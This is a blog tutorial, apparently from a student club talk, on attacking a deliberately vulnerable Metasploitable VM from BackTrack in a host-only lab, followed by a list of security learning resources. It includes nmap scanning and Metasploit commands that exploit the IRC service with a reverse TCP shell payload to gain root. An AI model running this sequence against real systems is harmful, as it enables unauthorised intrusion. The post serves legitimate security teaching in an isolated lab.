Posted on January 4, 2013
Today we will go through the talk I gave at the ACM club last semester. I will also be talking about some resources for you, the student interested in cyber security.
Today we will be talking about backtrack and metasploitable.
Backtrack: an operating system used to penetration test systems around the world.
metasploitable: an operating system that is vulnerable, on purpose, so you can understand how to attack stuff.
Backtrack is basically a ubuntu distribution with a bunch of cyber security tools tacked on. I recommend running backtrack through a VM rather than giving it a whole computer. While backtrack is pretty awesome, its still a specialized OS. If you are serious about security you should give it at least a 100 gigs of space. (You’ll need this for nexpose).
So let’s get started:
Today we are going to use backtrack to attack metasploitable. We could attack one of many, many vulnerabilities, but for convenience we will be exploiting the IRC vulnerability that comes with metasploitable.
So first you’ll need to download metasploitable and backtrack.
You can get a lot more packages at sourceforge that are exploitable. I highly recommend poking around and seeing what you can play with!!!
Alright, next you need virtual box (or some other virtualization software):
There are a lot of reasons why virtual box is awesome. However if we start getting into virtualization, we will probably never get to breaking into anything. You can look for other posts by me on virtualization in the near future.
Important note: Not all processors support virtualization, (most new CPU’s do). You can check this by running:
dmesg | less
look for statements like: “kvm: disabled by bios” and “kvm: no hardware support”
looking at the tutorial:
So once you have virtual box (what I am using) or your computer and you have downloaded the ISO files, you’ll need to install them.
You’ll need to do the following in virtualbox:
new->name: backtrack -> memory size: 1024 (just what I used) ->create a virtual hard drive now->VDI->fixed size-> 100 GB
Then you need to click on the newly created hard drive, hit the folder button, find the backtrack ISO and then hit start.
You’ll need to do the same thing for metasploitable.
Okay, now we are ready to do some hacking (almost).
Now we need to adjust some settings in our virtual machines.
Go into settings->network
You’ll need a host only adapter for both metasploitable and backtrack. MAKE SURE YOU DO NOT GIVE METASPLOITABLE A NAT ADAPTER!!!!
If you do this you will be giving a vulnerable operating system access to the internet. Doing this will mean your system is very easily compromisable. Essentially its like putting up a white flag, then running up to everyone that would want to kill you and asking them to shot you, with a very large gun, on the whole internet.
What you your system should look like at this point:
You should also have a metasploitable window that looks like this:
Once you start backtrack you will need to do the following:
hit enter at boot:
Then you will need to hit text-only mode (whatever the first option is)
And a backtrack window that looks like this:
Now just type in “startx” and you will get to a GUI.
If you want to do everything from the command line, you can, but i don’t recommend it.
Okay, so now we are going to get to the attacking part!!!!
I recommend going through each of the open ports in metasploitable, because attacking each service is good experience. Typically, non vulnerable machines will have at most 2 open ports. In the case of mac you won’t see any ( I tried this last night).
So first you will need to log into metasploitable, the username and password are: msfadmin
now run ifconfig
Notice the ip address: 192.168.56.102 , this is what we care about.
Now go into your backtrack VM
We will be running the command nmap -A -v 192.168.56.102 (This is the ip address of metasploitable in our example)
It is important to note that this maybe different on your machine. You should run ifconfig on the metasploitable vm to be sure.
If you ran nmap correctly, you should get a list of all the open ports on metasploitable, looks like 23 in all. (Quiet a bit of practice)
Each of the ports is a specific service, which has a networking protocol. Typically a service will always run over the same port. For instance port 80 is always http. (We can see its listed here)
This is how metasploit will know what services our target machine is running. (If we were attacking a real system we would scan for a whole bunch of ports, rather than just one.)
Now open a new terminal in backtrack and run
This is metasploit, the penetration testing framework.
now run the command search scanner
This will give you a listing of all the exploits available. Since we are going to attack IRC, we want to run:
Now all we need to do type:
Then type show options
then type set RHOST 192.168.56.102 (this is metasploitable’s IP address)
Then type show payloads
Then you need to set a payload using
set PAYLOAD generic/shell_reverse_tcp
Now we have to set our host ip address. For this run ifconfig in metasploit in a seperate window.
Now run set LHOST 192.168.56.101 (backtrack’s ip address in our example)
Now simply type exploit
if all went well, you should see the screen above, just type whoami
if you see root, then you got root access!!! (the holy grail of all cyber security challenges)
Now let’s talk about references.
This is a short list of I have compiled of ways to improve your skills as a cyber security expert:
http://isisblogs.poly.edu/ <- nyu-poly’s blog
This blog is home to some of the most badass hackers and cyber security experts I know. You can trust anything that is written here.
This is Dan Guido’s homepage. He is one of the most knowledgeable hackers I have ever heard lecture.
A great blog, filled with tutorials and interesting articles, I highly recommend this as a secondary source to the isis blog.
Where to get pretty much any security tool you could want, for free.
A decent description of cyber security terms
A series of lectures for those interested in the policy side of cyber security
A decent overview of cybersecurity topics
More policy things.
Government R&D website
Lots and lots of security videos (some of them you have to pay for)
An overview of tools by the us government.
the reverse engineering subreddit, need I say more?